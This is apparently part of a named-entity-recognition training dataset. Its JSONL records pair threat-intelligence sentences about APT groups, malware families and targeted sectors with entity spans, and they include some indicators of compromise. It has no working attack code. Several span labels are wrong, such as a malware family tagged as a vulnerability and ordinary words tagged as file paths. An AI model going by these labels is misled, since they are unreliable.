[[2203, 2209]], "FILEPATH: malicious sample": [[2597, 2613]], "FILEPATH: SWAnalytics’": [[3355, 3367]], "THREAT_ACTOR: sheep shavers”": [[3705, 3719]], "FILEPATH: Batmobi": [[4036, 4043]], "FILEPATH: Duapps": [[4046, 4052]], "FILEPATH: Cheetah SDK": [[4071, 4082]], "THREAT_ACTOR: actor": [[4116, 4121]], "MALWARE: Panda Banker": [[4136, 4148]], "ORGANIZATION: Arbor": [[4213, 4218]], "FILEPATH: Panda Banker": [[4289, 4301], [4381, 4393], [4604, 4616]], "FILEPATH: banking": [[4427, 4434]], "FILEPATH: malware": [[4435, 4442]], "FILEPATH: Ursnif": [[4521, 4527]], "FILEPATH: Urlzone": [[4532, 4539]], "ORGANIZATION: financial institutions": [[4652, 4674]], "THREAT_ACTOR: Operation Pawn Storm": [[4686, 4706]], "ORGANIZATION: economic": [[4720, 4728]], "ORGANIZATION: political": [[4733, 4742]], "ORGANIZATION: military": [[4818, 4826]], "ORGANIZATION: governments": [[4829, 4840]], "ORGANIZATION: defense industries": [[4843, 4861]], "ORGANIZATION: media": [[4872, 4877]], "FILEPATH: SEDNIT": [[4992, 4998]], "ORGANIZATION: Microsoft": [[5025, 5034]], "FILEPATH: XAgent": [[5134, 5140]], "FILEPATH: IOS_XAGENT.A": [[5153, 5165]], "FILEPATH: MadCap": [[5225, 5231]], "FILEPATH: XAGENT.B": [[5249, 5257]], "THREAT_ACTOR: SEDNIT-related": [[5284, 5298]], "ORGANIZATION: personal data": [[5319, 5332]]}, "info": {"id": "cyberner_stix_train_004164", "source": "cyberner_stix_train"}}
{"text": "This example is from a later version of EventBot , and in other versions the naming convention is very similar , with bot IDs such as word100 , word101 , word102 , and test2005 , test2006 etc . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 .", "spans": {"MALWARE: EventBot": [[40, 48]], "MALWARE: Panda Banker": [[261, 273]], "THREAT_ACTOR: Rocket Kitten": [[323, 336]]}, "info": {"id": "cyberner_stix_train_004165", "source": "cyberner_stix_train"}}
{"text": "We assess with high confidence that this modified version is operated by the infamous Wolf Research . The attacker is from North Korea . This research paper will delve into another prominent group of attackers referred to as “ IXESHE ” ( pronounced “ i-sushi ” ) , based on one of the more common detection names security companies use for the malware they utilize . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {"ORGANIZATION: Wolf Research": [[86, 99]], "THREAT_ACTOR: IXESHE": [[227, 233]], "SYSTEM: CSP": [[433, 436]]}, "info": {"id": "cyberner_stix_train_004166", "source": "cyberner_stix_train"}}
{"text": "This time resets every time the user performs some activity . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts . DDKONG Plugin : File Name : H istory.nls . Mandiant identified the historical execution of malicious binaries across multiple systems using cdhash values stored in the XPdb .", "spans": {"THREAT_ACTOR: group": [[90, 95]], "TOOL: Powermud": [[172, 180]], "THREAT_ACTOR: Seedworm group": [[209, 223]], "TOOL: customized PowerShell": [[230, 251]], "TOOL: LaZagne": [[254, 261]], "TOOL: Crackmapexec scripts": [[268, 288]], "MALWARE: DDKONG": [[291, 297]], "FILEPATH: H istory.nls": [[319, 331]], "MALWARE: malicious binaries": [[382, 400]], "SYSTEM: multiple systems": [[408, 424]]}, "info": {"id": "cyberner_stix_train_004167", "source": "cyberner_stix_train"}}
{"text": "Take voice call playback process for example . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . However the unflattening of ANEL code had to be performed in the later maturity level since the assignment of block comparison variable heavily depends on opaque predicates . The first script is the RAW data the retrieved from the JS file and the second one is the decoded one .", "spans": {"VULNERABILITY: Carbanak": [[75, 83]], "ORGANIZATION: banks": [[117, 122]], "MALWARE: ANEL": [[268, 272]]}, "info": {"id": "cyberner_stix_train_004168", "source": "cyberner_stix_train"}}
{"text": "] com , points to the IP address 54.69.156.31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 . Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice.exe . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"FILEPATH: C:\\ProgramData\\IntegratedOffice.exe": [[421, 456]], "MALWARE: OT malware": [[488, 498]]}, "info": {"id": "cyberner_stix_train_004169", "source": "cyberner_stix_train"}}
{"text": "At the time of writing , Locky ransomware remains their malware of choice , even as the group continues to experiment with a variety of additional malware .", "spans": {"MALWARE: Locky": [[25, 30]]}, "info": {"id": "cyberner_stix_train_004170", "source": "cyberner_stix_train"}}
{"text": "In case of failure , it will sleep for three seconds and try again .", "spans": {}, "info": {"id": "cyberner_stix_train_004171", "source": "cyberner_stix_train"}}
{"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . In early August , Unit 42 identified two attacks using similar techniques .", "spans": {"ORGANIZATION: 360 Core Security": [[22, 39]], "THREAT_ACTOR: APT-C-06": [[72, 80]], "VULNERABILITY: (CVE-2018-8174)": [[132, 147]], "ORGANIZATION: Unit 42": [[180, 187]]}, "info": {"id": "cyberner_stix_train_004172", "source": "cyberner_stix_train"}}
{"text": "Those targeted include Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia .", "spans": {"SYSTEM: Paypal Business": [[23, 38]], "SYSTEM: Revolut": [[41, 48]], "SYSTEM: Barclays": [[51, 59]], "SYSTEM: UniCredit": [[62, 71]], "SYSTEM: CapitalOne UK": [[74, 87]], "SYSTEM: HSBC UK": [[90, 97]], "SYSTEM: Santander UK": [[100, 112]], "SYSTEM: TransferWise": [[115, 127]], "SYSTEM: Coinbase": [[130, 138]], "SYSTEM: paysafecard": [[141, 152]], "MALWARE: Filensfer": [[199, 208]], "ORGANIZATION: government": [[326, 336]], "ORGANIZATION: energy": [[339, 345]], "ORGANIZATION: technology sectors": [[352, 370]]}, "info": {"id": "cyberner_stix_train_004173", "source": "cyberner_stix_train"}}
{"text": "However , analysts may not always see the indicators of compromise in the server ’ s response . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer . The protection is enabled to all processes except for ones in the following list : Svchost.exe , Lsass.exe , Winlogon.exe , Services.exe , Csrss.exe , ctfmon.exe , Rundll32.exe , mpnotify.exe , update.exe . The first with a valid handle to close the process created .", "spans": {"ORGANIZATION: labor rights advocates": [[180, 202]], "ORGANIZATION: foreign policy institutions": [[224, 251]], "FILEPATH: Svchost.exe": [[444, 455]], "FILEPATH: Lsass.exe": [[458, 467]], "FILEPATH: Winlogon.exe": [[470, 482]], "FILEPATH: Services.exe": [[485, 497]], "FILEPATH: Csrss.exe": [[500, 509]], "FILEPATH: ctfmon.exe": [[512, 522]], "FILEPATH: Rundll32.exe": [[525, 537]], "FILEPATH: mpnotify.exe": [[540, 552]], "FILEPATH: update.exe": [[555, 565]]}, "info": {"id": "cyberner_stix_train_004174", "source": "cyberner_stix_train"}}
{"text": "On the other hand , dynamic analysis tools ( like debuggers or sandbox ) face the anti-debug and anti-analysis tricks hidden in the virtualized code itself that detects sandbox environments and alters the behavior of the malware . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong . It is impossible to start analyzing every piece of software we run , especially with all the regular updates we are encouraged or required to install . TIEDYE can communicate with a C2 server using a range of supported protocols described as follows .", "spans": {"TOOL: Emissary": [[242, 250]], "SYSTEM: C2 server": [[536, 545]]}, "info": {"id": "cyberner_stix_train_004175", "source": "cyberner_stix_train"}}
{"text": "The attack group has made incremental changes to ZeroT since our last analysis .", "spans": {"MALWARE: ZeroT": [[49, 54]]}, "info": {"id": "cyberner_stix_train_004176", "source": "cyberner_stix_train"}}
{"text": "The following are the three files:Defender.sct – The malicious JavaScript based scriptlet file . Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide .", "spans": {"MALWARE: files:Defender.sct": [[28, 46]], "MALWARE: scriptlet": [[80, 89]], "MALWARE: file": [[90, 94]], "FILEPATH: Ploutus-D": [[103, 112], [185, 194]], "ORGANIZATION: ATM vendors": [[236, 247]]}, "info": {"id": "cyberner_stix_train_004177", "source": "cyberner_stix_train"}}
{"text": "About 57 % of these devices are located in Asia and about 9 % are in Europe . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . and so forth . Further analysis of COSMICENERGY is available as part of .", "spans": {"THREAT_ACTOR: APT38": [[98, 103]], "ORGANIZATION: banking": [[220, 227]], "MALWARE: COSMICENERGY": [[277, 289]]}, "info": {"id": "cyberner_stix_train_004178", "source": "cyberner_stix_train"}}
{"text": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL .", "spans": {"MALWARE: Zebrocy": [[4, 11]], "MALWARE: Trojan": [[12, 18]], "TOOL: C2": [[80, 82]]}, "info": {"id": "cyberner_stix_train_004179", "source": "cyberner_stix_train"}}
{"text": "Figure 4 . Group-IB experts continuously monitor the Silence’ activities . Get system information .", "spans": {"ORGANIZATION: Group-IB": [[11, 19]], "THREAT_ACTOR: Silence’": [[53, 61]]}, "info": {"id": "cyberner_stix_train_004180", "source": "cyberner_stix_train"}}
{"text": "In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website .", "spans": {"THREAT_ACTOR: Cobalt Hacking Group": [[42, 62]], "TOOL: Cobalt Strike": [[184, 197]], "ORGANIZATION: Myanmar Union Election Commission": [[471, 504]], "ORGANIZATION: UEC": [[507, 510]]}, "info": {"id": "cyberner_stix_train_004181", "source": "cyberner_stix_train"}}
{"text": "As the same name suggests , the artifact appears in fact to act as a tunnel for the attacker to remotely access the internal network and maintain persistence .", "spans": {}, "info": {"id": "cyberner_stix_train_004182", "source": "cyberner_stix_train"}}
{"text": "However , no command is received from the C2 until the inactiveTime field ( see beaconing information image above ) has at least the value of 2000000 . Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests . DDKONG Plugin : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"THREAT_ACTOR: Seedworm": [[152, 160]], "THREAT_ACTOR: cyber espionage group": [[183, 204]], "MALWARE: DDKONG": [[287, 293]], "TOOL: DLL": [[333, 336]], "SYSTEM: MS Windows": [[356, 366]], "ORGANIZATION: Talos researchers": [[369, 386]], "TOOL: Open Babel": [[435, 445]]}, "info": {"id": "cyberner_stix_train_004183", "source": "cyberner_stix_train"}}
{"text": "Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22]], "MALWARE: backdoor": [[40, 48]], "THREAT_ACTOR: Turla": [[93, 98]], "VULNERABILITY: exploit": [[105, 112]], "VULNERABILITY: CVE-2018-4878": [[140, 153]], "THREAT_ACTOR: attacker": [[166, 174]]}, "info": {"id": "cyberner_stix_train_004184", "source": "cyberner_stix_train"}}
{"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: maritime": [[54, 62]], "ORGANIZATION: research institutes": [[128, 147]], "ORGANIZATION: academic organizations": [[150, 172]], "ORGANIZATION: private firms": [[179, 192]], "MALWARE: GozNym": [[221, 227]], "ORGANIZATION: bank": [[278, 282]], "MALWARE: URL": [[286, 289]], "MALWARE: SSL certificate": [[294, 309]]}, "info": {"id": "cyberner_stix_train_004185", "source": "cyberner_stix_train"}}
{"text": "] comaccount-manager [ . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . The first zone we became aware of was “ hugesoft.org ” , which was registered through eNom , Inc. in October 2004 . Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Palo Alto Networks": [[25, 43]], "TOOL: Infy": [[215, 219], [267, 271]], "TOOL: Infy M.": [[224, 231]], "TOOL: malware": [[282, 289]], "TOOL: keylogger": [[323, 332]], "DOMAIN: hugesoft.org": [[417, 429]]}, "info": {"id": "cyberner_stix_train_004186", "source": "cyberner_stix_train"}}
{"text": "Previous reports alleged this surveillanceware tool was deployed using ‘ honey traps ’ where the actor behind it would reach out to targets via fake social media profiles of young women . Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims . The first service name that is not installed on the system becomes the ZxShell service name . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)—including the leak of nearly 10 million drivers ' licenses — to the University of Rochester and multiple corporations .", "spans": {"MALWARE: ZxShell": [[436, 443]], "TOOL: MOVEit": [[463, 469]], "ORGANIZATION: Oregon DMV": [[539, 549]], "ORGANIZATION: and Louisiana OMV": [[550, 567]], "ORGANIZATION: University of Rochester": [[664, 687]], "ORGANIZATION: multiple corporations": [[692, 713]]}, "info": {"id": "cyberner_stix_train_004187", "source": "cyberner_stix_train"}}
{"text": "By using Google Cloud Messaging botnet owners can operate without a C & C server , thus eliminating the threat of the botnet being detected and blocked by law enforcement authorities . Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator . The log file is encrypted using the same algorithm as the one used to encrypt static strings from the module . Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"SYSTEM: Google Cloud Messaging": [[9, 31]], "ORGANIZATION: satellite communications operator": [[259, 292]], "TOOL: Open Babel": [[406, 416]]}, "info": {"id": "cyberner_stix_train_004188", "source": "cyberner_stix_train"}}
{"text": "RECEIVE_BOOT_COMPLETED - allow the application to launch itself after system boot . The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools . Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 .", "spans": {"THREAT_ACTOR: EvilGnome": [[123, 132]], "TOOL: SFX": [[154, 157]], "MALWARE: Windows tools": [[272, 285]]}, "info": {"id": "cyberner_stix_train_004189", "source": "cyberner_stix_train"}}
{"text": "This means that the malware can be remotely eliminated by an SMS message . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The threat then executes \" svchost.exe \" .", "spans": {"THREAT_ACTOR: APT37": [[127, 132]], "MALWARE: svchost.exe": [[224, 235]]}, "info": {"id": "cyberner_stix_train_004190", "source": "cyberner_stix_train"}}
{"text": "There have been several recent examples of companies choosing to release their software directly to consumers , bypassing traditional storefronts . ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"ORGANIZATION: ESET": [[148, 152]], "THREAT_ACTOR: Machete": [[188, 195]], "THREAT_ACTOR: APT37": [[267, 272]], "ORGANIZATION: financial company": [[346, 363]]}, "info": {"id": "cyberner_stix_train_004191", "source": "cyberner_stix_train"}}
{"text": "The web shell parameters in this attack match to the China Chopper parameters , as described in FireEye 's analysis of China Chopper . Our research indicates that it has started targeting Japanese users .", "spans": {"THREAT_ACTOR: China Chopper": [[53, 66], [119, 132]], "ORGANIZATION: FireEye": [[96, 103]], "ORGANIZATION: Japanese users": [[188, 202]]}, "info": {"id": "cyberner_stix_train_004192", "source": "cyberner_stix_train"}}
{"text": "Back then , CosmicDuke still lacked most of the credential-stealing functionality found in later samples .", "spans": {"MALWARE: CosmicDuke": [[12, 22]]}, "info": {"id": "cyberner_stix_train_004193", "source": "cyberner_stix_train"}}
{"text": "Disguised Spyware Uploaded on Google Play Store We identified previously unknown spyware apps being successfully uploaded on Google Play Store multiple times over the course of over two years . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization . The screenshots are exfiltrated via the ImgBB website . The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": {"SYSTEM: Google Play Store": [[30, 47], [125, 142]], "THREAT_ACTOR: OilRig group": [[262, 274]], "TOOL: ImgBB": [[496, 501]], "ORGANIZATION: Harrison": [[535, 543], [637, 645]], "ORGANIZATION: Ashley Madison": [[584, 598]]}, "info": {"id": "cyberner_stix_train_004194", "source": "cyberner_stix_train"}}
{"text": "Non-governmental political organizations may provide access to desirable national policy information , especially foreign policy , but may not have the same level of protection and security as governmental organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004195", "source": "cyberner_stix_train"}}
{"text": "Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Their targets are marine companies that operate in and around the South China Sea , an LOC of much Chinese interest .", "spans": {"VULNERABILITY: CVE-2012-0158": [[52, 65]], "TOOL: NetTraveler Trojan": [[77, 95]], "ORGANIZATION: marine companies": [[116, 132]]}, "info": {"id": "cyberner_stix_train_004196", "source": "cyberner_stix_train"}}
{"text": "The threat actors used shortened URLs in spear phishing messages and fake news websites to direct targets to download KASPERAGENT .", "spans": {"MALWARE: KASPERAGENT": [[118, 129]]}, "info": {"id": "cyberner_stix_train_004197", "source": "cyberner_stix_train"}}
{"text": "However , it ’ s possible the set of commands may change in future versions of the Trojan . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": {"MALWARE: decoy documents": [[96, 111]], "ORGANIZATION: politically": [[162, 173]], "ORGANIZATION: militarily": [[177, 187]], "ORGANIZATION: political": [[247, 256]], "THREAT_ACTOR: TEMP.Periscope": [[328, 342]], "ORGANIZATION: engineering firms": [[431, 448]], "ORGANIZATION: shipping": [[451, 459]], "ORGANIZATION: transportation": [[464, 478]], "ORGANIZATION: manufacturing": [[481, 494]], "ORGANIZATION: defense": [[497, 504]], "ORGANIZATION: government offices": [[507, 525]], "ORGANIZATION: research universities": [[532, 553]]}, "info": {"id": "cyberner_stix_train_004198", "source": "cyberner_stix_train"}}
{"text": "Under these conditions , the app continues executing and the intent of targeting Xiaomi devices and users could be inferred , however poorly written code results in execution in more environments than perhaps intended ; further checks are made to ascertain whether the app is running on an emulator , perhaps to evade researcher analysis environments . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled 中東呼吸器症候 群(MERS)の予防 , ” which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"ORGANIZATION: Xiaomi": [[81, 87]], "THREAT_ACTOR: APT41": [[363, 368]], "ORGANIZATION: Japanese media organization": [[380, 407]], "ORGANIZATION: governments": [[683, 694]], "ORGANIZATION: militaries": [[697, 707]], "ORGANIZATION: defense attaches": [[710, 726]], "ORGANIZATION: media entities": [[729, 743]], "ORGANIZATION: dissidents": [[750, 760]], "ORGANIZATION: figures": [[765, 772]], "ORGANIZATION: Russian government": [[796, 814]]}, "info": {"id": "cyberner_stix_train_004199", "source": "cyberner_stix_train"}}
{"text": "PCRat S-VULNAME/Gh0st is a payload that we do not see this group using frequently .", "spans": {"VULNERABILITY: PCRat S-VULNAME/Gh0st": [[0, 21]]}, "info": {"id": "cyberner_stix_train_004200", "source": "cyberner_stix_train"}}
{"text": "We reverse engineered XLoader and found that it appears to target South Korea-based banks and game development companies . Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . After the reconstruction of the full infection chain , we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company .", "spans": {"MALWARE: XLoader": [[22, 29]], "THREAT_ACTOR: Sofacy's": [[136, 144]]}, "info": {"id": "cyberner_stix_train_004201", "source": "cyberner_stix_train"}}
{"text": "Anti-emulator code . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm .", "spans": {"THREAT_ACTOR: FIN7": [[94, 98]], "TOOL: malicious Office document": [[155, 180]], "ORGANIZATION: FireEye DTI": [[285, 296]], "ORGANIZATION: FireEye": [[305, 312]], "THREAT_ACTOR: Ke3chang": [[327, 335]]}, "info": {"id": "cyberner_stix_train_004202", "source": "cyberner_stix_train"}}
{"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . The malware starts communicating with the C&C server by sending basic information about the infected machine .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat actor group": [[10, 28]], "ORGANIZATION: restaurant": [[79, 89]], "ORGANIZATION: services": [[92, 100]], "ORGANIZATION: financial sectors": [[105, 122]], "FILEPATH: malware": [[129, 136]], "TOOL: C&C": [[167, 170]]}, "info": {"id": "cyberner_stix_train_004203", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day exploits": [[144, 161]], "THREAT_ACTOR: Attackers": [[203, 212]], "ORGANIZATION: Microsoft": [[223, 232]], "VULNERABILITY: exploit": [[249, 256]], "VULNERABILITY: CVE-2018-0798": [[257, 270]], "THREAT_ACTOR: Maudi": [[349, 354]]}, "info": {"id": "cyberner_stix_train_004204", "source": "cyberner_stix_train"}}
{"text": "In addition , it monitors to verify if com.android.music.helper package is removed . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage .", "spans": {"VULNERABILITY: NSA exploits": [[171, 183]], "ORGANIZATION: high-tech": [[248, 257]], "ORGANIZATION: manufacturing": [[262, 275]], "THREAT_ACTOR: DragonOK": [[309, 317]], "ORGANIZATION: economic": [[367, 375]]}, "info": {"id": "cyberner_stix_train_004205", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //www [ . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder . Several metadata fields ( specifically title , subject , author , comments , manager , and company ) appear to have been populated with different data sets . The top most targeted organizations included those from technology and social media , NATO , and the transportation sector .", "spans": {"THREAT_ACTOR: APT28": [[109, 114]], "TOOL: Responder": [[124, 133]], "ORGANIZATION: technology": [[350, 360]], "ORGANIZATION: social media": [[365, 377]], "ORGANIZATION: NATO": [[380, 384]], "ORGANIZATION: transportation sector": [[395, 416]]}, "info": {"id": "cyberner_stix_train_004206", "source": "cyberner_stix_train"}}
{"text": "This is a stark contrast with other attacks commonly associated with the Sofacy group where generally no more than a handful of victims are targeted within a single organization in a focus-fire style of attack .", "spans": {"THREAT_ACTOR: Sofacy": [[73, 79]]}, "info": {"id": "cyberner_stix_train_004207", "source": "cyberner_stix_train"}}
{"text": "Trend Micro 's Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies . It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "TOOL: leading sandbox": [[91, 106]], "TOOL: machine learning technologies": [[111, 140]], "MALWARE: technical exploitation capabilities": [[172, 207]], "VULNERABILITY: zero-day": [[274, 282]]}, "info": {"id": "cyberner_stix_train_004208", "source": "cyberner_stix_train"}}
{"text": "The widespread proliferation and use of the following tools suggest that the group likely has the knowledge and capability to use them as part of its operations :", "spans": {}, "info": {"id": "cyberner_stix_train_004209", "source": "cyberner_stix_train"}}
{"text": "These more recent developments indicate that XLoader is still evolving . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It is worth noting that the IP response observed to set ping mode was the reverse of the IP used to set text mode (i.e., 199.250.250.99 ) . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": {"MALWARE: XLoader": [[45, 52]], "THREAT_ACTOR: TG-0416": [[73, 80]], "THREAT_ACTOR: Advanced Persistent Threat": [[120, 146]], "THREAT_ACTOR: APT": [[149, 152]], "ORGANIZATION: technology": [[236, 246]], "ORGANIZATION: industrial": [[249, 259]], "ORGANIZATION: manufacturing": [[262, 275]], "ORGANIZATION: human rights groups": [[278, 297]], "ORGANIZATION: government": [[300, 310]], "ORGANIZATION: pharmaceutical": [[313, 327]], "ORGANIZATION: medical technology": [[334, 352]], "IP_ADDRESS: 199.250.250.99": [[476, 490]], "ORGANIZATION: The Ashley Madison Affair": [[517, 542]], "ORGANIZATION: Hulu": [[568, 572]], "ORGANIZATION: Disney+": [[601, 608]]}, "info": {"id": "cyberner_stix_train_004210", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : american.blackcmd.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: american.blackcmd.com": [[10, 31]]}, "info": {"id": "cyberner_stix_train_004211", "source": "cyberner_stix_train"}}
{"text": "Due to TrickMo ’ s persistence implementation mentioned earlier , this lockdown screen persists after a restart and is re-initiated every time the device becomes interactive . The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Russia .", "spans": {"MALWARE: TrickMo": [[7, 14]]}, "info": {"id": "cyberner_stix_train_004212", "source": "cyberner_stix_train"}}
{"text": "] ponethus [ . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . Aumlib , which for years has been used in targeted attacks , now encodes certain HTTP communications . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"ORGANIZATION: Tibetan community": [[18, 35]], "TOOL: malware": [[105, 112]], "MALWARE: Aumlib": [[167, 173]], "ORGANIZATION: WordPress appears to be the top target": [[293, 331]]}, "info": {"id": "cyberner_stix_train_004213", "source": "cyberner_stix_train"}}
{"text": "To get around this , the app then uses its root privilege to inject code into the Setup Wizard , extract the CAPTCHA image , and sends it to a remote server to try to solve the CAPTCHA . First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners . APT17 was embedding the encoded C2 IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a “ dead drop resolver. ” Encoding the IP address makes it more difficult to identify the true C2 address for network security professionals . We called this new malware ?", "spans": {"THREAT_ACTOR: APT17": [[325, 330]], "TOOL: C2": [[357, 359], [618, 620]], "MALWARE: BLACKCOFFEE": [[379, 390]], "ORGANIZATION: Microsoft": [[413, 422]], "TOOL: TechNet": [[423, 430]], "MALWARE: malware": [[685, 692]]}, "info": {"id": "cyberner_stix_train_004214", "source": "cyberner_stix_train"}}
{"text": "The group is known for their advanced attacks that leverage custom-built Windows malware ( Kasperagent , Micropsia ) as well as Android malware ( Vamp , GnatSpy ) .", "spans": {"SYSTEM: Windows": [[73, 80]], "MALWARE: Kasperagent": [[91, 102]], "MALWARE: Micropsia": [[105, 114]], "SYSTEM: Android": [[128, 135]], "MALWARE: Vamp": [[146, 150]], "MALWARE: GnatSpy": [[153, 160]]}, "info": {"id": "cyberner_stix_train_004215", "source": "cyberner_stix_train"}}
